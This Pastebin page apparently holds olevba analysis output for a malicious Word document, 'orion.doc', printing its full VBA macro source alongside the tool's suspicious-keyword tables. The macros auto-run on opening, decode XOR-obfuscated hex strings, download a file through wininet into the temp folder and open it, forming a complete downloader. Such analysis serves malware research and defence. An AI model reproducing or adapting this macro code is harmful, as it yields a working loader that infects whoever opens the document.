Pastebin
API
tools
faq
paste
Login
Sign up
Please fix the following errors:
New Paste
Syntax Highlighting
olevba 0.25 - http://decalage.info/python/oletools Flags Filename ----------- ----------------------------------------------------------------- OLE:MASIHB- orion.doc (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown) =============================================================================== FILE: orion.doc Type: OLE ------------------------------------------------------------------------------- VBA MACRO ThisDocument.cls in file: orion.doc - OLE stream: u'Macros/VBA/ThisDocument' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub InIn() CALTHA End Sub Sub autoopen() InIn End Sub - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ANALYSIS: +----------+----------+---------------------------------------+ | Type | Keyword | Description | +----------+----------+---------------------------------------+ | AutoExec | AutoOpen | Runs when the Word document is opened | +----------+----------+---------------------------------------+ ------------------------------------------------------------------------------- VBA MACRO FILE6.bas in file: orion.doc - OLE stream: u'Macros/VBA/FILE6' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Option Explicit Public Const C1C1C1A = "BRITTANY" #If VBA7 And Win64 Then Public _ Declare _ PtrSafe _ Function _ C1C1C1 Lib _ "wininet.dll" Alias "InternetCloseHandle" (ByRef C26C26C26 As LongPtr) As Long Public _ Declare _ PtrSafe _ Function _ C2C2C2 Lib _ "wininet.dll" Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As LongPtr Public _ Declare _ PtrSafe _ Function _ C3C3C3 Lib _ "wininet.dll" Alias "InternetReadFile" (ByVal C32C32C32 As LongPtr, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer Public _ Declare _ PtrSafe _ Function _ C4C4C4 Lib _ "wininet.dll" Alias "InternetOpenUrlA" (ByVal C36C36C36 As LongPtr, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As LongPtr #Else Public Declare Function C1C1C1 Lib "wininet.dll" _ Alias "InternetCloseHandle" (ByRef C26C26C26 As Long) As Long Public Declare Function C2C2C2 Lib "wininet.dll" _ Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As Long Public Declare Function C3C3C3 Lib "wininet.dll" _ Alias "InternetReadFile" (ByVal C32C32C32 As Long, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer Public Declare Function C4C4C4 Lib "wininet.dll" _ Alias "InternetOpenUrlA" (ByVal C36C36C36 As Long, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As Long #End If Private Const BRANDI = 8162 Private Const BRANDY As String = "HAZ" Private Const BREANA = 1 Private Const BREDA = &H4000000 Public Function C16C16C16 _ (ByVal BREE As String) As Boolean #If VBA7 _ And Win64 Then Dim BRETT As LongPtr, BRIANNA As LongPtr #Else Dim BRETT As Long, BRIANNA As Long #End If Dim BRIAR As Long Dim C33C33C33 As String * BRANDI, BRIELLE As String Dim BRIER As Integer, BRIONY As Double BRETT = C2C2C2(BRANDY, BREANA, vbNullString, vbNullString, 0) If BRETT = 0 Then Exit Function End If Dim FiGaMan As Boolean If BRITANNIA(BRIANNA, BRETT) Then End If If BRIANNA = 0 Then BRIONY = 0 Else C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR BRIELLE = C33C33C33 Do While BRIAR <> 0 C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR Dim BRITT As Long For BRITT = 6 To 8 If BRITT = 38 Then End Next BRITT BRIELLE = BRIELLE + Mid(C33C33C33, 1, BRIAR) Loop BRIONY = Len(BRIELLE): BRIER = FreeFile Open BREE _ For Binary Access Write _ Lock Write _ As #BRIER Put #BRIER, _ , BRIELLE Dim BRITTA As Double For BRITTA = 2 To 3 If BRITTA = 37 Then End Next BRITTA Close #BRIER End If C1C1C1 BRIANNA C1C1C1 BRETT BRIELLE = "" If BRIONY Then C16C16C16 = True End If End Function Public Function CANDICE(CANDIDA As String) As Integer CANDICE = Len(CANDIDA) End Function - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ANALYSIS: +------------+----------------+-----------------------------------------+ | Type | Keyword | Description | +------------+----------------+-----------------------------------------+ | Suspicious | Lib | May run code from a DLL | | Suspicious | Open | May open a file | | Suspicious | Write | May write to a file (if combined with | | | | Open) | | Suspicious | Put | May write to a file (if combined with | | | | Open) | | Suspicious | Binary | May read or write a binary file (if | | | | combined with Open) | | Suspicious | Hex Strings | Hex-encoded strings were detected, may | | | | be used to obfuscate strings (option | | | | --decode to see all) | | Suspicious | Base64 Strings | Base64-encoded strings were detected, | | | | may be used to obfuscate strings | | | | (option --decode to see all) | | IOC | wininet.dll | Executable file name | +------------+----------------+-----------------------------------------+ ------------------------------------------------------------------------------- VBA MACRO PIDLE0.bas in file: orion.doc - OLE stream: u'Macros/VBA/PIDLE0' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Public Function C8C8C8(CAMERON As String, CAMILLA As String) As String Dim CAMILLE As Integer Dim CAMMIE As Integer Dim CAMRYN As Double For CAMRYN = 1 To 3 If CAMRYN = 32 Then End Next CAMRYN Dim CANDACE As Long Dim CANDI As String For CANDACE = 1 _ To _ ( _ CANDICE _ (CAMILLA) _ / 2) CAMILLE = Val("&H" & _ (Mid$(CAMILLA, _ (2 * CANDACE) - 1, 2))) CAMMIE = Asc(Mid$(CAMERON, _ ((CANDACE Mod Len(CAMERON)) + 1), 1)) CANDI = CANDI + Chr(CAMILLE Xor CAMMIE) Next CANDACE C8C8C8 = CANDI End Function Public Function C21C21C21() As Object Dim C22C22C22 As String C22C22C22 = C8C8C8(C9C9C9, C10C10C10) Set C21C21C21 = CreateObject(C22C22C22) End Function Sub CALTHA() Dim CAMELLIA As Long Dim CANDIS As Double For CANDIS = 44 To 46 If CANDIS = 32 Then End Next CANDIS CAMELLIA = 89 CALANTHA (CAMELLIA) End Sub - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ANALYSIS: +------------+--------------+-----------------------------------------+ | Type | Keyword | Description | +------------+--------------+-----------------------------------------+ | Suspicious | CreateObject | May create an OLE object | | Suspicious | Chr | May attempt to obfuscate specific | | | | strings | | Suspicious | Xor | May attempt to obfuscate specific | | | | strings | | Suspicious | Hex Strings | Hex-encoded strings were detected, may | | | | be used to obfuscate strings (option | | | | --decode to see all) | +------------+--------------+-----------------------------------------+ ------------------------------------------------------------------------------- VBA MACRO IDL4.bas in file: orion.doc - OLE stream: u'Macros/VBA/IDL4' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Public Const C18C18C18 = "675B26585F6D754333585A2055472A5B5D" Public Const C19C19C19 = "6850770C1D264C56" Public Const C20C20C20 = "5C473744096C1B553947456D50566C05026C0403771A563B51" Public Const C10C10C10 = "6750315D43375D5D241A752A5856104D4037515E0C5659265747" Public Const C9C9C9 = "C43C43C43C43C43C43C43C43C43C43" Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean If CAILEIGH.FileExists(CAILYN) Then CADY = True Else CADY = False End If End Function #If VBA7 _ And Win64 Then Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean #Else Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean #End If Dim CALLIDORA As String CALLIDORA = C8C8C8(C9C9C9, C20C20C20) CALIDA _ = C4C4C4 _ ( _ CALLA, _ CALLIDORA, vbNullString, _ 0, _ BREDA, 0) BRITANNIA = True End Function - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ANALYSIS: +------------+-------------+-----------------------------------------+ | Type | Keyword | Description | +------------+-------------+-----------------------------------------+ | Suspicious | Hex Strings | Hex-encoded strings were detected, may | | | | be used to obfuscate strings (option | | | | --decode to see all) | +------------+-------------+-----------------------------------------+ ------------------------------------------------------------------------------- VBA MACRO M.bas in file: orion.doc - OLE stream: u'Macros/VBA/M' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Public Function C5C5C5(ByRef C23C23C23 As Object) As Object Set C5C5C5 = C23C23C23.GetSpecialFolder(2) End Function Sub CALANTHA(CALEIGH As Long) C25C25C25 ("CACACARDRDRDRD") End Sub Public Function C25C25C25(C24C24C24 As String) C6C6C6 End Function Public Function C6C6C6() Dim C7C7C7 As Object Set C7C7C7 = C21C21C21 Dim C11C11C11 As Object Set C11C11C11 = C5C5C5(C7C7C7) Dim C15C15C15 Dim C12C12C12 C12C12C12 = C8C8C8(C9C9C9, C19C19C19) C15C15C15 = C11C11C11 & C12C12C12 If CADY(C7C7C7, C15C15C15) Then C7C7C7. _ DeleteFile C15C15C15 End If If C16C16C16(C15C15C15) Then End If If CADY(C7C7C7, C15C15C15) Then End If Dim C17C17C17 Set C17C17C17 = CreateObject _ (C8C8C8 _ (C9C9C9, C18C18C18)) C17C17C17.Open C15C15C15 End Function - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ANALYSIS: +------------+--------------+-----------------------------------------+ | Type | Keyword | Description | +------------+--------------+-----------------------------------------+ | Suspicious | CreateObject | May create an OLE object | | Suspicious | Open | May open a file | | Suspicious | Hex Strings | Hex-encoded strings were detected, may | | | | be used to obfuscate strings (option | | | | --decode to see all) | +------------+--------------+-----------------------------------------+ ------------------------------------------------------------------------------- VBA MACRO UserForm1.frm in file: orion.doc - OLE stream: u'Macros/VBA/UserForm1' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - (empty macro)
Optional Paste Settings
Category:
None
Cryptocurrency
Cybersecurity
Fixit
Food
Gaming
Haiku
Help
History
Housing
Jokes
Legal
Money
Movies
Music
Pets
Photo
Science
Software
Source Code
Spirit
Sports
Travel
TV
Writing
Tags:
Syntax Highlighting:
None
Bash
C
C#
C++
CSS
HTML
JSON
Java
JavaScript
Lua
Markdown (PRO members only)
Objective C
PHP
Perl
Python
Ruby
Swift
4CS
6502 ACME Cross Assembler
6502 Kick Assembler
6502 TASM/64TASS
ABAP
AIMMS
ALGOL 68
APT Sources
ARM
ASM (NASM)
ASP
ActionScript
ActionScript 3
Ada
Apache Log
AppleScript
Arduino
Asymptote
AutoIt
Autohotkey
Avisynth
Awk
BASCOM AVR
BNF
BOO
Bash
Basic4GL
Batch
BibTeX
Blitz Basic
Blitz3D
BlitzMax
BrainFuck
C
C (WinAPI)
C Intermediate Language
C for Macs
C#
C++
C++ (WinAPI)
C++ (with Qt extensions)
C: Loadrunner
CAD DCL
CAD Lisp
CFDG
CMake
COBOL
CSS
Ceylon
ChaiScript
Chapel
Clojure
Clone C
Clone C++
CoffeeScript
ColdFusion
Cuesheet
D
DCL
DCPU-16
DCS
DIV
DOT
Dart
Delphi
Delphi Prism (Oxygene)
Diff
E
ECMAScript
EPC
Easytrieve
Eiffel
Email
Erlang
Euphoria
F#
FO Language
Falcon
Filemaker
Formula One
Fortran
FreeBasic
FreeSWITCH
GAMBAS
GDB
GDScript
Game Maker
Genero
Genie
GetText
Go
Godot GLSL
Groovy
GwBasic
HQ9 Plus
HTML
HTML 5
Haskell
Haxe
HicEst
IDL
INI file
INTERCAL
IO
ISPF Panel Definition
Icon
Inno Script
J
JCL
JSON
Java
Java 5
JavaScript
Julia
KSP (Kontakt Script)
KiXtart
Kotlin
LDIF
LLVM
LOL Code
LScript
Latex
Liberty BASIC
Linden Scripting
Lisp
Loco Basic
Logtalk
Lotus Formulas
Lotus Script
Lua
M68000 Assembler
MIX Assembler
MK-61/52
MPASM
MXML
MagikSF
Make
MapBasic
Markdown (PRO members only)
MatLab
Mercury
MetaPost
Modula 2
Modula 3
Motorola 68000 HiSoft Dev
MySQL
Nagios
NetRexx
Nginx
Nim
NullSoft Installer
OCaml
OCaml Brief
Oberon 2
Objeck Programming Langua
Objective C
Octave
Open Object Rexx
OpenBSD PACKET FILTER
OpenGL Shading
Openoffice BASIC
Oracle 11
Oracle 8
Oz
PARI/GP
PCRE
PHP
PHP Brief
PL/I
PL/SQL
POV-Ray
ParaSail
Pascal
Pawn
Per
Perl
Perl 6
Phix
Pic 16
Pike
Pixel Bender
PostScript
PostgreSQL
PowerBuilder
PowerShell
ProFTPd
Progress
Prolog
Properties
ProvideX
Puppet
PureBasic
PyCon
Python
Python for S60
QBasic
QML
R
RBScript
REBOL
REG
RPM Spec
Racket
Rails
Rexx
Robots
Roff Manpage
Ruby
Ruby Gnuplot
Rust
SAS
SCL
SPARK
SPARQL
SQF
SQL
SSH Config
Scala
Scheme
Scilab
SdlBasic
Smalltalk
Smarty
StandardML
StoneScript
SuperCollider
Swift
SystemVerilog
T-SQL
TCL
TeXgraph
Tera Term
TypeScript
TypoScript
UPC
Unicon
UnrealScript
Urbi
VB.NET
VBScript
VHDL
VIM
Vala
Vedit
VeriLog
Visual Pro Log
VisualBasic
VisualFoxPro
WHOIS
WhiteSpace
Winbatch
XBasic
XML
XPP
Xojo
Xorg Config
YAML
YARA
Z80 Assembler
ZXBasic
autoconf
jQuery
mIRC
newLISP
q/kdb+
thinBasic
Paste Expiration:
Never
Burn after read
10 Minutes
1 Hour
1 Day
1 Week
2 Weeks
1 Month
6 Months
1 Year
Paste Exposure:
Public
Unlisted
Private
Folder:
(members only)
Password
NEW
Enabled
Disabled
Burn after read
NEW
Paste Name / Title:
Create New Paste
Hello
Guest
Sign Up
or
Login
Sign in with Facebook
Sign in with Twitter
Sign in with Google
You are currently not logged in, this means you can not edit or delete anything you paste.
Sign Up
or
Login
Public Pastes
Untitled
45 min ago | 9.18 KB
ᴛᴡᴏ ɪɴ ᴏɴᴇ, ᴏʀ ᴏɴᴇ ɪɴ ᴛᴡᴏ.
CSS | 1 hour ago | 4.28 KB
Untitled
2 hours ago | 11.87 KB
Untitled
4 hours ago | 8.83 KB
[IN REVIEW] PS/PM: Grace Edits
6 hours ago | 0.81 KB
Untitled
6 hours ago | 11.06 KB
[IN REVIEW] PS/PM: PM - Post Launch
6 hours ago | 0.72 KB
[IN REVIEW] PS/PM: PM - Launch Checklist
7 hours ago | 0.73 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the
Cookies Policy
.
OK, I Understand
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!